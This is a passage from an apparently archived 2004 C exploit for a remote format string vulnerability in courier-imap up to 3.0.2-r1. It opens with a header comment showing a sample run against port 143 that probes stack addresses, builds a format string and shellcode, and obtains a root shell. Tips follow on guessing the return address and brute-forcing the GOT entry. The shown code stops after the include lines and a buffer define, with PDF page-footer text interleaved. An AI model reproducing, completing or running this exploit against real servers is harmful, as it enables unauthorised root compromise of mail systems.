1 /*
2 courier−imap <= 3.0.2−r1 Remote Format String Vulnerability exploit
3
4 Author: ktha at hush dot com
5
6 Tested on FreeBSD 4.10−RELEASE with courier−imap−3.0.2
7
8 Special thanks goes to andrewg for providing the FreeBSD box.
9
10 Greetings: all the guys from irc pulltheplug com and irc netric org
11
12 bash−2.05b$ ./sm00ny−courier_imap_fsx
13 courier−imap <= 3.0.2−r1 Remote Format String Vulnerability exploit by ktha at hush dot com
14 [*] Launching attack against 127.0.0.1:143
15 [+] Got current ebp(5100): 0xbfbfb050
16 [+] Got possible saved ebp(3281): 0xbfbfe390
17 [+] Got possible write on the stack pointer(3293): 0xbfbfe3c0
18 [+] Verifying...failed
19 [+] Got possible saved ebp(3286): 0xbfbfe3a4
20 [+] Got possible write on the stack pointer(3298): 0xbfbfe3d4
21 [+] Verifying...failed
22 [+] Got possible saved ebp(3287): 0xbfbfe3a8
23 [+] Got possible write on the stack pointer(3299): 0xbfbfe3d8
24 [+] Verifying...OK
25 [+] Building fmt...done
26 [+] Building shellcode...done
27 [*] Using ret: 0x8057000
28 [*] Using got of fprintf(): 0x804fefc
29 [*] Checking for shell..
30 uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
31
32 N.B. 1. ret can be guessed ;)
33 2. got, well.. that’s a different story, it must be bruteforced
34 3. "ce_number" & "se_number" can be set with some default values when running multiple times
35 4. shell is usable for aprox 1 min
36
37 [ Need a challenge ? ]
38 [ Visit http://www.pulltheplug.com ]
39
40 */
41
42 #include <stdlib.h>
43 #include <unistd.h>
44 #include <sys/types.h>
45 #include <sys/socket.h>
46 #include <netinet/in.h>
47 #include <arpa/inet.h>
48 #include <netdb.h>
49 #include <string.h>
50 #include <errno.h>
51 #include <signal.h>
52 #include <stdio.h>
Page 1/9
CourierIMAP 3.0.2r1 auth_debug Remote Format String Exploit
ktha
09/02/2004
53 #include <sys/stat.h>
54 #include <fcntl.h>
55
56 #define BIGBUF 2048
57
58 #de